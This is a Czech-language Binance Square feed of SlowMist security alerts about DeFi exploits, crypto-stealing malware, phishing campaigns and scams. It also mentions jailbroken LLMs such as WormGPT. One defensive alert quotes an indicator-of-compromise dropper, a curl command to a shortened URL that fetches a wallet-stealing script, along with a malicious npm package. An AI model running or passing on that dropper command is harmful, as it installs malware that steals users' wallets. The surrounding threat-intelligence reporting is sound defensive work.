Binance Square

SlowMist_Team

0 Sledujících
1 Sledujících
2 Označeno To se mi líbí
0 Sdílené
Příspěvky
·
--
🚨SlowMist TI Alert🚨 Náš monitorovací systém MistEye detekoval podezřelé transakce zahrnující @ResupplyFi, s ztrátami přibližně 5,59 milionu dolarů. Útočník manipuloval s výměnným kurzem cvcrvUSD tím, že posílal dary na smlouvu cvcrvUSD Controller, čímž nakonec ukradl velké množství tokenů reUSD. Jako vždy, buďte obezřetní!
🚨SlowMist TI Alert🚨

Náš monitorovací systém MistEye detekoval podezřelé transakce zahrnující @ResupplyFi, s ztrátami přibližně 5,59 milionu dolarů.

Útočník manipuloval s výměnným kurzem cvcrvUSD tím, že posílal dary na smlouvu cvcrvUSD Controller, čímž nakonec ukradl velké množství tokenů reUSD.

Jako vždy, buďte obezřetní!
🚨SlowMist TI Upozornění🚨 Náš monitorovací systém MistEye detekoval podezřelé transakce zahrnující @ResupplyFi, s ztrátami přibližně 5,59 milionu dolarů. Útočník manipuloval s kurzem cvcrvUSD tím, že prováděl dary na smlouvu crvUSD Controller, čímž nakonec ukradl velké množství tokenů reUSD. Jako vždy, buďte ostražití!
🚨SlowMist TI Upozornění🚨

Náš monitorovací systém MistEye detekoval podezřelé transakce zahrnující @ResupplyFi, s ztrátami přibližně 5,59 milionu dolarů.

Útočník manipuloval s kurzem cvcrvUSD tím, že prováděl dary na smlouvu crvUSD Controller, čímž nakonec ukradl velké množství tokenů reUSD.

Jako vždy, buďte ostražití!
🚨 SlowMist TI Alert 🚨 Nový malware s názvem #SparkKitty, který krade všechny fotografie z infikovaných zařízení iOS a Android – hledá fráze pro kryptoměnové peněženky. ⚠️ Dodáno prostřednictvím: 🔸 "币coin" (App Store) 🔸 "SOEX" (Google Play, 10K+ instalací, nyní odstraněno) 🔸 Kasino aplikace, hry pro dospělé, klony TikToku 🌍 Hlavně cílí na uživatele v jihovýchodní Asii a Číně, ale neexistují žádné regionální limity. 🛡️ Klíčové tipy: 🔹 Neinstalujte neznámé aplikace 🔹 Vyhněte se sideloading APK 🔹 Používejte antivirové nástroje Buďte ve střehu! (Zdroj: @kaspersky)
🚨 SlowMist TI Alert 🚨

Nový malware s názvem #SparkKitty, který krade všechny fotografie z infikovaných zařízení iOS a Android – hledá fráze pro kryptoměnové peněženky.

⚠️ Dodáno prostřednictvím:
🔸 "币coin" (App Store)
🔸 "SOEX" (Google Play, 10K+ instalací, nyní odstraněno)
🔸 Kasino aplikace, hry pro dospělé, klony TikToku

🌍 Hlavně cílí na uživatele v jihovýchodní Asii a Číně, ale neexistují žádné regionální limity.

🛡️ Klíčové tipy:
🔹 Neinstalujte neznámé aplikace
🔹 Vyhněte se sideloading APK
🔹 Používejte antivirové nástroje

Buďte ve střehu! (Zdroj: @kaspersky)
💰Více než 50 miliard USDT v vkladech a 50 miliard v výběrech prošlo HuionePay za posledních 18 měsíců — nyní pod globálním regulačním dohledem kvůli údajnému příjmu, pohybu a výběru podvodných prostředků (většinou prostřednictvím USDT na TRON). Prozkoumali jsme data s @MistTrack_io a vytvořili Dune dashboard pro mapování jeho on-chain stopy. 📊Dashboard: https://t.co/DHKtY3X9th ✍️Zpráva: https://t.co/O6uWC2S1qU #TRON #USDT #CryptoSecurity #AML #SlowMist #MistTrack #Huione
💰Více než 50 miliard USDT v vkladech a 50 miliard v výběrech prošlo HuionePay za posledních 18 měsíců — nyní pod globálním regulačním dohledem kvůli údajnému příjmu, pohybu a výběru podvodných prostředků (většinou prostřednictvím USDT na TRON).

Prozkoumali jsme data s @MistTrack_io a vytvořili Dune dashboard pro mapování jeho on-chain stopy.

📊Dashboard: https://t.co/DHKtY3X9th
✍️Zpráva: https://t.co/O6uWC2S1qU

#TRON #USDT #CryptoSecurity #AML #SlowMist #MistTrack #Huione
🚨 Bezpečnostní TI upozornění 🚨 Podle komunitního partnera @1nf0s3cpt cílená aktivní phishingová kampaň útočí na uživatele Web3 s falešnými nabídkami práce (např. $120/hodina), aby je podvodně přiměla k provedení škodlivého skriptu, který krade soubory peněženky. 🔍 Klíčové IOCs: 🔸GitLab repo: https://t.co/ivGN93PS4b 🔸Droper: curl https://t.co/fwRuktoVd9 -H "x-secret-key: _" 🧪 Útočná metoda je velmi podobná předchozímu použití NPM balíčků od Lazaruse k šíření škodlivého kódu: https://t.co/bBC4i2vYpA 🚨 Zjistili jsme, že byl právě publikován nový škodlivý NPM balíček: https://t.co/SjgmO1FOIL 🔸Pravděpodobně spojený GitHub: apollo-hero 🔸Email nahrávače: skelstar125@gmail.com ⚠️ NIKDY neinstalujte ani nespouštějte neznámé balíčky nebo skripty. Vždy ověřujte zdroje. #LAZARUS #Phishing
🚨 Bezpečnostní TI upozornění 🚨

Podle komunitního partnera @1nf0s3cpt cílená aktivní phishingová kampaň útočí na uživatele Web3 s falešnými nabídkami práce (např. $120/hodina), aby je podvodně přiměla k provedení škodlivého skriptu, který krade soubory peněženky.

🔍 Klíčové IOCs:
🔸GitLab repo: https://t.co/ivGN93PS4b
🔸Droper: curl https://t.co/fwRuktoVd9 -H "x-secret-key: _"

🧪 Útočná metoda je velmi podobná předchozímu použití NPM balíčků od Lazaruse k šíření škodlivého kódu:
https://t.co/bBC4i2vYpA

🚨 Zjistili jsme, že byl právě publikován nový škodlivý NPM balíček:
https://t.co/SjgmO1FOIL
🔸Pravděpodobně spojený GitHub: apollo-hero
🔸Email nahrávače: skelstar125@gmail.com

⚠️ NIKDY neinstalujte ani nespouštějte neznámé balíčky nebo skripty. Vždy ověřujte zdroje.

#LAZARUS #Phishing
🚨SlowMist TI Upozornění🚨 MistEye detekoval potenciálně podezřelé aktivity související s @Bankroll_Status. Jak vždy, buďte ostražití! https://bscscan.com/address/0xadefb902cab716b8043c5231ae9a50b8b4ee7c4e
🚨SlowMist TI Upozornění🚨

MistEye detekoval potenciálně podezřelé aktivity související s @Bankroll_Status.

Jak vždy, buďte ostražití!

https://bscscan.com/address/0xadefb902cab716b8043c5231ae9a50b8b4ee7c4e
🚨Upozornění na bezpečnost SlowMist🚨 Detekovali jsme potenciálně podezřelé aktivity související s @meta_pool. Hlavním důvodem je, že funkce _deposit byla přepsána, což umožňuje libovolné mintování prostřednictvím funkce mint bez nutnosti převodu tokenů. Jako vždy, buďte ostražití!
🚨Upozornění na bezpečnost SlowMist🚨

Detekovali jsme potenciálně podezřelé aktivity související s @meta_pool. Hlavním důvodem je, že funkce _deposit byla přepsána, což umožňuje libovolné mintování prostřednictvím funkce mint bez nutnosti převodu tokenů.

Jako vždy, buďte ostražití!
🚨 Bezpečnostní upozornění SlowMist🚨 ‼️Pozor na novou hrozbu od skupiny LAZARUS APT — malware #OtterCookie, který krade informace, cílí na profesionály ve finančním a krypto průmyslu. 🎯 Taktiky útoku: 🔹Předstírání renomovaných firem s falešnými pohovory nebo investičními nabídkami 🔹Používání deepfake technologií k napodobování tazatelů/investorů ve videohovorech 🔹Oklamání obětí, aby spustily malware maskovaný jako programátorské výzvy nebo aktualizace aplikací 🔹Jakmile je spuštěn, OtterCookie tiše krade citlivá data 🕵️‍♂️ Cíle zahrnují: 🔹Uložené přihlašovací údaje v prohlížeči 🔹Hesla a certifikáty macOS Keychain 🔹Místně uložené informace o krypto peněženkách a soukromé klíče 🛡️ Zůstaňte v bezpečí: 🔹Ověřte všechny nevyžádané pracovní/investiční nabídky 🔹Nikdy nespouštějte neznámé binární soubory, zejména „výzvy“ nebo „aktualizace“ 🔹Používejte antivirový software a sledujte abnormální chování 📚 Přečtěte si více o #APT: https://t.co/hyzwQoiu23 cc @im23pds
🚨 Bezpečnostní upozornění SlowMist🚨

‼️Pozor na novou hrozbu od skupiny LAZARUS APT — malware #OtterCookie, který krade informace, cílí na profesionály ve finančním a krypto průmyslu.

🎯 Taktiky útoku:
🔹Předstírání renomovaných firem s falešnými pohovory nebo investičními nabídkami
🔹Používání deepfake technologií k napodobování tazatelů/investorů ve videohovorech
🔹Oklamání obětí, aby spustily malware maskovaný jako programátorské výzvy nebo aktualizace aplikací
🔹Jakmile je spuštěn, OtterCookie tiše krade citlivá data

🕵️‍♂️ Cíle zahrnují:
🔹Uložené přihlašovací údaje v prohlížeči
🔹Hesla a certifikáty macOS Keychain
🔹Místně uložené informace o krypto peněženkách a soukromé klíče

🛡️ Zůstaňte v bezpečí:
🔹Ověřte všechny nevyžádané pracovní/investiční nabídky
🔹Nikdy nespouštějte neznámé binární soubory, zejména „výzvy“ nebo „aktualizace“
🔹Používejte antivirový software a sledujte abnormální chování

📚 Přečtěte si více o #APT:

https://t.co/hyzwQoiu23

cc @im23pds
🚨SlowMist Bezpečnostní Upozornění🚨 SlowMist nedávno obdržel informace, které naznačují, že APT skupina Lazarus používá nový stealer nazvaný OtterCookie v cílených útocích na profesionály v oblasti kryptoměn a financí. 🎭Taktiky: - Falešné pracovní pohovory/investorské hovory - Deepfake videa k napodobení náborářů - Malware maskovaný jako „kódovací výzvy“ nebo „aktualizace“ 😈Krade: - Přihlašovací údaje uložené v prohlížeči - Hesla a certifikáty z macOS Keychain - Informace o peněženkách a soukromé klíče 🛡️Bezpečnostní Doporučení: 🔹Zacházejte s nevyžádanými nabídkami práce/investic a vzdálenými pohovory s opatrností. 🔹Nikdy nespouštějte neznámé spustitelné soubory, zejména pokud jsou prezentovány jako „technické výzvy“ nebo „aktualizační balíčky.“ 🔹Zvyšte schopnosti EDR a monitorujte abnormální aktivitu. Používejte antivirové nástroje a pravidelně auditujte své koncové body. ⚠️Buďte v bezpečí — vždy ověřujte, než důvěřujete. #Lazarus #APT #OtterCookie #Kryptobezpečnost
🚨SlowMist Bezpečnostní Upozornění🚨

SlowMist nedávno obdržel informace, které naznačují, že APT skupina Lazarus používá nový stealer nazvaný OtterCookie v cílených útocích na profesionály v oblasti kryptoměn a financí.

🎭Taktiky:
- Falešné pracovní pohovory/investorské hovory
- Deepfake videa k napodobení náborářů
- Malware maskovaný jako „kódovací výzvy“ nebo „aktualizace“

😈Krade:
- Přihlašovací údaje uložené v prohlížeči
- Hesla a certifikáty z macOS Keychain
- Informace o peněženkách a soukromé klíče

🛡️Bezpečnostní Doporučení:
🔹Zacházejte s nevyžádanými nabídkami práce/investic a vzdálenými pohovory s opatrností.
🔹Nikdy nespouštějte neznámé spustitelné soubory, zejména pokud jsou prezentovány jako „technické výzvy“ nebo „aktualizační balíčky.“
🔹Zvyšte schopnosti EDR a monitorujte abnormální aktivitu. Používejte antivirové nástroje a pravidelně auditujte své koncové body.

⚠️Buďte v bezpečí — vždy ověřujte, než důvěřujete.

#Lazarus #APT #OtterCookie #Kryptobezpečnost
⚠️Jak AI pokračuje vpřed, objevuje se temnější stránka: Neomezené velké jazykové modely. Na rozdíl od běžných LLM s vestavěnými bezpečnostními opatřeními, tyto "uvolněné" nebo záměrně modifikované modely jsou navrženy tak, aby obcházely etické omezení—umožňují phishing, generování malwaru a podvod. V tomto článku zkoumáme vzestup nástrojů jako WormGPT, FraudGPT a GhostGPT, jejich zneužívání v kryptoměnovém prostoru a rostoucí bezpečnostní výzvy, které představují. Přečtěte si celou analýzu👇 https://t.co/yt1r95mlP4 #AI #KybernetickáBezpečnost #LLM #Phishing #Malware
⚠️Jak AI pokračuje vpřed, objevuje se temnější stránka: Neomezené velké jazykové modely.

Na rozdíl od běžných LLM s vestavěnými bezpečnostními opatřeními, tyto "uvolněné" nebo záměrně modifikované modely jsou navrženy tak, aby obcházely etické omezení—umožňují phishing, generování malwaru a podvod.

V tomto článku zkoumáme vzestup nástrojů jako WormGPT, FraudGPT a GhostGPT, jejich zneužívání v kryptoměnovém prostoru a rostoucí bezpečnostní výzvy, které představují.

Přečtěte si celou analýzu👇
https://t.co/yt1r95mlP4

#AI #KybernetickáBezpečnost #LLM #Phishing #Malware
🚨 Bezpečnostní upozornění SlowMist🚨 Android trojan #Crocodilus nyní cílí na uživatele kryptoměn a bankovní aplikace po celém světě po nedávných vylepšeních. ⚠️ Hlavní hrozby: 🔹Šíří se prostřednictvím falešných aktualizací prohlížeče v reklamách na Facebooku 🔹Krádež přihlašovacích údajů pomocí útoků přes překryvy 🔹Extrahuje fráze pro obnovu kryptoměnových peněženek a soukromé klíče 🔹Vkládá falešná čísla "bankovní podpory" do kontaktních seznamů 🔹Malware jako služba: K dispozici k pronájmu (100–300 USDT/útok) 📵 Vyhněte se neznámým aktualizacím aplikací a odkazům na reklamy. Buďte obezřetní! (Zdroj: @ThreatFabric)
🚨 Bezpečnostní upozornění SlowMist🚨

Android trojan #Crocodilus nyní cílí na uživatele kryptoměn a bankovní aplikace po celém světě po nedávných vylepšeních.

⚠️ Hlavní hrozby:

🔹Šíří se prostřednictvím falešných aktualizací prohlížeče v reklamách na Facebooku
🔹Krádež přihlašovacích údajů pomocí útoků přes překryvy
🔹Extrahuje fráze pro obnovu kryptoměnových peněženek a soukromé klíče
🔹Vkládá falešná čísla "bankovní podpory" do kontaktních seznamů
🔹Malware jako služba: K dispozici k pronájmu (100–300 USDT/útok)

📵 Vyhněte se neznámým aktualizacím aplikací a odkazům na reklamy.

Buďte obezřetní! (Zdroj: @ThreatFabric)
🚨Souhrn bezpečnosti Web3 za květen 2025🚨 📊Podle Hacked od SlowMist (https://t.co/e90CSvTm6B): ⚠️15 hacků ➡️ ~$257M ztraceno ❄️~$162M obnoveno/zamraženo 🎣Ztráty z phishingu prostřednictvím @realScamSniffer: 7,164 obětí ➡️ ~$9.6M ukradeno Hlavní incidenty: • Cetus Protocol ztratil $230M v útoku na základě přetečení aritmetiky • Cork Protocol byl zneužit za $12M+ kvůli nedostatečné validaci uživatelských dat • BitoPro ztratil $11.5M; prostředky byly prané přes Tornado Cash, Thorchain a Wasabi • Demex ztratil $950K z manipulace s oráklem cílené na zastaralou trezor • Zunami Protocol ztratil $500K; příčina se vyšetřuje Bezpečnostní záznamy: ⚠️Zranitelnosti smluv způsobily 95% celkových ztrát z hacků 🎭Převzetí účtů opět vzrostlo 😈Lazarus Group nyní cílí na jednotlivce—jedna oběť ztratila $5.2M na malwaru ✍️Celá zpráva:
🚨Souhrn bezpečnosti Web3 za květen 2025🚨

📊Podle Hacked od SlowMist (https://t.co/e90CSvTm6B):
⚠️15 hacků ➡️ ~$257M ztraceno
❄️~$162M obnoveno/zamraženo

🎣Ztráty z phishingu prostřednictvím @realScamSniffer:
7,164 obětí ➡️ ~$9.6M ukradeno

Hlavní incidenty:
• Cetus Protocol ztratil $230M v útoku na základě přetečení aritmetiky
• Cork Protocol byl zneužit za $12M+ kvůli nedostatečné validaci uživatelských dat
• BitoPro ztratil $11.5M; prostředky byly prané přes Tornado Cash, Thorchain a Wasabi
• Demex ztratil $950K z manipulace s oráklem cílené na zastaralou trezor
• Zunami Protocol ztratil $500K; příčina se vyšetřuje

Bezpečnostní záznamy:
⚠️Zranitelnosti smluv způsobily 95% celkových ztrát z hacků
🎭Převzetí účtů opět vzrostlo
😈Lazarus Group nyní cílí na jednotlivce—jedna oběť ztratila $5.2M na malwaru

✍️Celá zpráva:
🚨Varování před podvodem Nedávno jsme pomohli uživateli, který narazil na podezřelý nástroj, jenž tvrdil, že jeho peněženka má "rizikovou autorizaci." Nástroj ho vyzval, aby vložil svůj soukromý klíč pro vyřešení problému. Po vyšetřování jsme identifikovali web—signature[.]land—jako platformu pro phishing. Tento web byl také označen jako škodlivý platformou Web3 proti podvodům @realScamSniffer. Klíčové zjištění: ♦️UI napodobuje legitimní nástroj Revoke ♦️Výsledky rizika jsou vyrobeny pro jakýkoli vstup ♦️Veškerý uživatelský vstup je přímo odesílán na: abpulimali@gmail[.]com Provozovatel za tímto webem, @Titanspace3, používá více klamných taktik: 🎭Používá avatar @zachxbt na Telegramu 🎭Předstírá, že je zaměstnancem SlowMist 🎭Spravuje účet na X s 74K sledujícími, často komentuje pod příspěvky kryptoměnových uživatelů, falešně tvrdí, že jejich peněženky jsou v nebezpečí a směruje je na phishingový odkaz, který je maskován jako "bezpečnostní nástroj." Průběh podvodu: 1⃣Vytvořit paniku kolem "rizikových schválení" 2⃣Návnada obětí do používání phishingového webu 3⃣Instrukce, aby zadali soukromé klíče pro "zrušení" 🛡️Doporučení – Nikdy nevkládejte svůj soukromý klíč na žádnou webovou stránku – Používejte pouze bezpečnostní nástroje z ověřených, oficiálních zdrojů – Buďte obezřetní a dodržujte princip nulové důvěry Pro podrobný rozbor tohoto případu si přečtěte náš nejnovější článek: https://t.co/IvrVPrT6Su #Phishing #Crypto #Web3 #Podvod #SociálníInženýrství #Revoke
🚨Varování před podvodem

Nedávno jsme pomohli uživateli, který narazil na podezřelý nástroj, jenž tvrdil, že jeho peněženka má "rizikovou autorizaci." Nástroj ho vyzval, aby vložil svůj soukromý klíč pro vyřešení problému.

Po vyšetřování jsme identifikovali web—signature[.]land—jako platformu pro phishing. Tento web byl také označen jako škodlivý platformou Web3 proti podvodům @realScamSniffer.

Klíčové zjištění:
♦️UI napodobuje legitimní nástroj Revoke
♦️Výsledky rizika jsou vyrobeny pro jakýkoli vstup
♦️Veškerý uživatelský vstup je přímo odesílán na: abpulimali@gmail[.]com

Provozovatel za tímto webem, @Titanspace3, používá více klamných taktik:
🎭Používá avatar @zachxbt na Telegramu
🎭Předstírá, že je zaměstnancem SlowMist
🎭Spravuje účet na X s 74K sledujícími, často komentuje pod příspěvky kryptoměnových uživatelů, falešně tvrdí, že jejich peněženky jsou v nebezpečí a směruje je na phishingový odkaz, který je maskován jako "bezpečnostní nástroj."

Průběh podvodu:
1⃣Vytvořit paniku kolem "rizikových schválení"
2⃣Návnada obětí do používání phishingového webu
3⃣Instrukce, aby zadali soukromé klíče pro "zrušení"

🛡️Doporučení
– Nikdy nevkládejte svůj soukromý klíč na žádnou webovou stránku
– Používejte pouze bezpečnostní nástroje z ověřených, oficiálních zdrojů
– Buďte obezřetní a dodržujte princip nulové důvěry

Pro podrobný rozbor tohoto případu si přečtěte náš nejnovější článek:
https://t.co/IvrVPrT6Su

#Phishing #Crypto #Web3 #Podvod #SociálníInženýrství #Revoke
🎉 SlowMist x Foresight News Festival draků 🎉 Vaše mnemotechnická fráze je životní linkou vaší kryptoměny — chraňte ji, mějte ji na paměti. 🧠⛓️ @Foresight_News právě vydali skvělý nový sběratelský kousek, rozdáváme 3 komunitě! Chcete se zúčastnit: 1⃣ Sledujte @Foresight_News & @SlowMist_Team 2⃣ Lajkněte + RT tento tweet & označte 3 přátele Výherci oznámeni: 4. června 🎁 Hodně štěstí všem!🤩
🎉 SlowMist x Foresight News Festival draků 🎉

Vaše mnemotechnická fráze je životní linkou vaší kryptoměny — chraňte ji, mějte ji na paměti. 🧠⛓️

@Foresight_News právě vydali skvělý nový sběratelský kousek, rozdáváme 3 komunitě!

Chcete se zúčastnit:
1⃣ Sledujte @Foresight_News & @SlowMist_Team
2⃣ Lajkněte + RT tento tweet & označte 3 přátele

Výherci oznámeni: 4. června 🎁

Hodně štěstí všem!🤩
🚨Bezpečnostní upozornění SlowMist🚨 Zaznamenali jsme potenciálně podezřelou aktivitu spojenou s @Corkprotocol. Jako vždy, buďte ostražití!
🚨Bezpečnostní upozornění SlowMist🚨

Zaznamenali jsme potenciálně podezřelou aktivitu spojenou s @Corkprotocol.

Jako vždy, buďte ostražití!
🚨Upozornění na bezpečnost SlowMist🚨 ☠️Nedávno několik uživatelů hlásilo, že obdrželi SMS zprávy od "známých burz", které říkaly: 🎭"Váš ověřovací kód pro výběr je xxx. Pokud jste tuto transakci nepožadovali, okamžitě zavolejte na xxx pro pomoc." 📱Jakmile zavoláte zpět, řeknou vám, že jde o „bezpečnostní incident“ a spojí vás s někým, kdo se vydává za „podporu hardwarových peněženek.“ 🎣Vedou vás na phishingovou stránku a podvádějí vás, abyste zadali svou mnemonickou frázi — což vede k krádežím z hardwarových peněženek v hodnotě přes 1 milion dolarů. ⚠️Podvodníci vědí, že důvěřujete burzám — a využívají tuto důvěru, aby vás podvedli, krok za krokem. Nedávno jsme zveřejnili podobný případ — podívejte se na náš podrobný článek, abyste posílili své povědomí a obranu: https://t.co/OLGtlY1HBV Pamatujte: 🔒Nikdy nesdílejte svou mnemonickou frázi. 🚫Nedůvěřujte neočekávaným hovorům, zprávám nebo odkazům. Vždy ověřujte prostřednictvím oficiálních zdrojů. #Web3Security #PhishingAlert #ColdWallet #CryptoScam #SocialEngineering
🚨Upozornění na bezpečnost SlowMist🚨

☠️Nedávno několik uživatelů hlásilo, že obdrželi SMS zprávy od "známých burz", které říkaly:

🎭"Váš ověřovací kód pro výběr je xxx. Pokud jste tuto transakci nepožadovali, okamžitě zavolejte na xxx pro pomoc."

📱Jakmile zavoláte zpět, řeknou vám, že jde o „bezpečnostní incident“ a spojí vás s někým, kdo se vydává za „podporu hardwarových peněženek.“

🎣Vedou vás na phishingovou stránku a podvádějí vás, abyste zadali svou mnemonickou frázi — což vede k krádežím z hardwarových peněženek v hodnotě přes 1 milion dolarů.

⚠️Podvodníci vědí, že důvěřujete burzám — a využívají tuto důvěru, aby vás podvedli, krok za krokem.

Nedávno jsme zveřejnili podobný případ — podívejte se na náš podrobný článek, abyste posílili své povědomí a obranu:
https://t.co/OLGtlY1HBV

Pamatujte:
🔒Nikdy nesdílejte svou mnemonickou frázi.
🚫Nedůvěřujte neočekávaným hovorům, zprávám nebo odkazům. Vždy ověřujte prostřednictvím oficiálních zdrojů.

#Web3Security #PhishingAlert #ColdWallet #CryptoScam #SocialEngineering
V posledních letech se uživatelé Coinbase opakovaně stali cílem útoků sociálního inženýrství — a 15. května Coinbase potvrdila zapojení insiderů. Jak to funguje: 📞 Falešný hovor podpory 📲 Provést uživatele přes Coinbase Wallet ⚠️ Poskytnout podvodnou mnemonickou frázi 💸 Vytáhnout aktiva pod tlakem a naléhavostí S @MistTrack_io jsme sledovali toky: ▪️ BTC převedeno přes THORChain / Chainflip / Defiway Bridge → DAI/USDT ▪️ ETH vyměněno na Uniswap → DAI/USDT ▪️ Fondy prané nebo stále nečinné Úplný rozbor👇 https://t.co/OLGtlY2frt #CryptoSecurity #SocialEngineering #Web3Security #Coinbase #Phishing
V posledních letech se uživatelé Coinbase opakovaně stali cílem útoků sociálního inženýrství — a 15. května Coinbase potvrdila zapojení insiderů.

Jak to funguje:

📞 Falešný hovor podpory
📲 Provést uživatele přes Coinbase Wallet
⚠️ Poskytnout podvodnou mnemonickou frázi
💸 Vytáhnout aktiva pod tlakem a naléhavostí

S @MistTrack_io jsme sledovali toky:

▪️ BTC převedeno přes THORChain / Chainflip / Defiway Bridge → DAI/USDT
▪️ ETH vyměněno na Uniswap → DAI/USDT
▪️ Fondy prané nebo stále nečinné

Úplný rozbor👇
https://t.co/OLGtlY2frt

#CryptoSecurity #SocialEngineering #Web3Security #Coinbase #Phishing
🚨Bezpečnostní upozornění SlowMist🚨 Detekovali jsme potenciálně podezřelou aktivitu související s @Nexo. Jako vždy, buďte ostražití! https://bscscan.com/address/0x0851ae80e137c53a8dbc48fce82efd1f50f3b9f2
🚨Bezpečnostní upozornění SlowMist🚨

Detekovali jsme potenciálně podezřelou aktivitu související s @Nexo.

Jako vždy, buďte ostražití!

https://bscscan.com/address/0x0851ae80e137c53a8dbc48fce82efd1f50f3b9f2
🚨SlowMist Varování před podvodem🚨 Obdrželi jsme zprávy o falešných Telegram skupinách, které se vydávají za #SlowMist a podvádějí uživatele prostřednictvím phishingových investičních odkazů. Jeden příklad: ❌t[.]me/slowmist1 — to nejsme MY.‼️ ✅ Prosíme, okamžitě hlaste takové skupiny na Telegramu. Pro vaši bezpečnost se vždy odkazujte na naše oficiální kanály: 1⃣Web: https://t.co/IO2VWk2pae 2⃣X: @SlowMist_Team & @MistTrack_io 3⃣Email: team@slowmist.com Pokud máte pochybnosti, neváhejte nás kontaktovat přímo. ⚠️Buďte ostražití a ověřte, než důvěřujete.
🚨SlowMist Varování před podvodem🚨

Obdrželi jsme zprávy o falešných Telegram skupinách, které se vydávají za #SlowMist a podvádějí uživatele prostřednictvím phishingových investičních odkazů. Jeden příklad: ❌t[.]me/slowmist1 — to nejsme MY.‼️

✅ Prosíme, okamžitě hlaste takové skupiny na Telegramu.

Pro vaši bezpečnost se vždy odkazujte na naše oficiální kanály:
1⃣Web: https://t.co/IO2VWk2pae
2⃣X: @SlowMist_Team & @MistTrack_io
3⃣Email: team@slowmist.com

Pokud máte pochybnosti, neváhejte nás kontaktovat přímo.

⚠️Buďte ostražití a ověřte, než důvěřujete.
🚀Velké novinky! @MistTrack_io MCP je nyní aktivní pro testování! Nyní můžete používat přirozený jazyk v #Claude, #Cursor a dalších klientech podporovaných MCP k volání API pro analýzu na blockchainu od #MistTrack — od profilování adres a hodnocení rizik po grafy toků fondů. 🧐Chytřejší, rychlejší a snadnější vyšetřování blockchainu — poháněné AI. ✍️V našem nejnovějším příspěvku: 🔹Co je MistTrack MCP 🔹Jak to používat 🔹Hlavní funkce 🔹Příklady skutečného použití https://t.co/Fvn2YZIuoI 👋Připraveni prozkoumat nový AI paradigmat pro sledování na blockchainu? Začněte zde: https://t.co/UCDcC9Dt51 #Web3 #AI #BlockchainSecurity #MCP
🚀Velké novinky! @MistTrack_io MCP je nyní aktivní pro testování!

Nyní můžete používat přirozený jazyk v #Claude, #Cursor a dalších klientech podporovaných MCP k volání API pro analýzu na blockchainu od #MistTrack — od profilování adres a hodnocení rizik po grafy toků fondů.

🧐Chytřejší, rychlejší a snadnější vyšetřování blockchainu — poháněné AI.

✍️V našem nejnovějším příspěvku:
🔹Co je MistTrack MCP
🔹Jak to používat
🔹Hlavní funkce
🔹Příklady skutečného použití
https://t.co/Fvn2YZIuoI

👋Připraveni prozkoumat nový AI paradigmat pro sledování na blockchainu? Začněte zde:
https://t.co/UCDcC9Dt51

#Web3 #AI #BlockchainSecurity #MCP
Přihlaste se a prozkoumejte další obsah
Prohlédněte si nejnovější zprávy o kryptoměnách
⚡️ Zúčastněte se aktuálních diskuzí o kryptoměnách
💬 Komunikujte se svými oblíbenými tvůrci
👍 Užívejte si obsah, který vás zajímá
E-mail / telefonní číslo
Mapa stránek
Předvolby souborů cookie
Pravidla a podmínky platformy